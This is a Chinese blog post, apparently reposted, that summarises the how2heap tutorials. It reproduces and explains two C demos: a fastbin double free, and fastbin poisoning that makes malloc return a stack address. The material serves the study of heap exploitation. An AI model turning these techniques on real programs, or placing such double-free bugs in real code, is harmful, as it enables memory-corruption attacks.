码迷,mamicode.com
首页 > 其他好文 > 详细

how2heap总结

时间:2017-12-08 01:22:52      阅读:12      评论:0      收藏:0      [点我收藏+]

标签:程序   cat   end   ddr   while   into   str   log   顺序   

今天,让我们来总结下how2heap,之前粗略过了一下,但最近发现还是有很多细节不太清楚,于是现在回头来重新调试下how2heap。

就按顺序来吧。

0x01 fastbin_dup:

源码:

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main()
 5 {
 6     fprintf(stderr, "This file demonstrates a simple double-free attack with fastbins.\n");
 7 
 8     fprintf(stderr, "Allocating 3 buffers.\n");
 9     int *a = malloc(8);
10     int *b = malloc(8);
11     int *c = malloc(8);
12 
13     fprintf(stderr, "1st malloc(8): %p\n", a);
14     fprintf(stderr, "2nd malloc(8): %p\n", b);
15     fprintf(stderr, "3rd malloc(8): %p\n", c);
16 
17     fprintf(stderr, "Freeing the first one...\n");
18     free(a);
19 
20     fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
21     // free(a);
22 
23     fprintf(stderr, "So, instead, we‘ll free %p.\n", b);
24     free(b);
25 
26     fprintf(stderr, "Now, we can free %p again, since it‘s not the head of the free list.\n", a);
27     free(a);
28 
29     fprintf(stderr, "Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we‘ll get %p twice!\n", a, b, a, a);
30     fprintf(stderr, "1st malloc(8): %p\n", malloc(8));
31     fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
32     fprintf(stderr, "3rd malloc(8): %p\n", malloc(8));
33 }

接下来我们来运下这个程序

技术分享图片

可以发现这是一个double free的分析,这个是fastbin内存分配的分析,fastbin是先入后出,free1 —— free2 —— free1,这样在使用的时候就是malloc1 —— malloc2 —— malloc1 —     — malloc2 —— malloc1……循环下去,可以再分配试一试。

 

0x02 fastbin_dup_into_stack:

源码:

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main()
 5 {
 6     fprintf(stderr, "This file extends on fastbin_dup.c by tricking malloc into\n"
 7            "returning a pointer to a controlled location (in this case, the stack).\n");
 8 
 9     unsigned long long stack_var;
10 
11     fprintf(stderr, "The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);
12 
13     fprintf(stderr, "Allocating 3 buffers.\n");
14     int *a = malloc(8);
15     int *b = malloc(8);
16     int *c = malloc(8);
17 
18     fprintf(stderr, "1st malloc(8): %p\n", a);
19     fprintf(stderr, "2nd malloc(8): %p\n", b);
20     fprintf(stderr, "3rd malloc(8): %p\n", c);
21 
22     fprintf(stderr, "Freeing the first one...\n");
23     free(a);
24 
25     fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
26     // free(a);
27 
28     fprintf(stderr, "So, instead, we‘ll free %p.\n", b);
29     free(b);
30 
31     fprintf(stderr, "Now, we can free %p again, since it‘s not the head of the free list.\n", a);
32     free(a);
33 
34     fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
35         "We‘ll now carry out our attack by modifying data at %p.\n", a, b, a, a);
36     unsigned long long *d = malloc(8);
37 
38     fprintf(stderr, "1st malloc(8): %p\n", d);
39     fprintf(stderr, "2nd malloc(8): %p\n", malloc(8));
40     fprintf(stderr, "Now the free list has [ %p ].\n", a);
41     fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
42         "so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
43         "so that malloc will think there is a free chunk there and agree to\n"
44         "return a pointer to it.\n", a);
45     stack_var = 0x20;
46 
47     fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
48     *d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
49 
50     fprintf(stderr, "3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
51     fprintf(stderr, "4th malloc(8): %p\n", malloc(8));
52 }

 接下来我们来运下这个程序

 技术分享图片

 会发现再次申请的时候就把我们伪造的栈空间当malloc来申请了,这其中的要点为将stack_var = 0x20,然后将stack_var -8 的地址赋值到*d处,也就是fastbin的fd处。再次maollc到指向stack+8的堆。

 

 

 

 

 

 

 

 

 

 

how2heap总结

标签:程序   cat   end   ddr   while   into   str   log   顺序   

(0)
(0)
   
举报
评论 一句话评论(0
0条  
登录后才能评论!
© 2014 mamicode.com 版权所有 京ICP备13008772号-2
迷上了代码!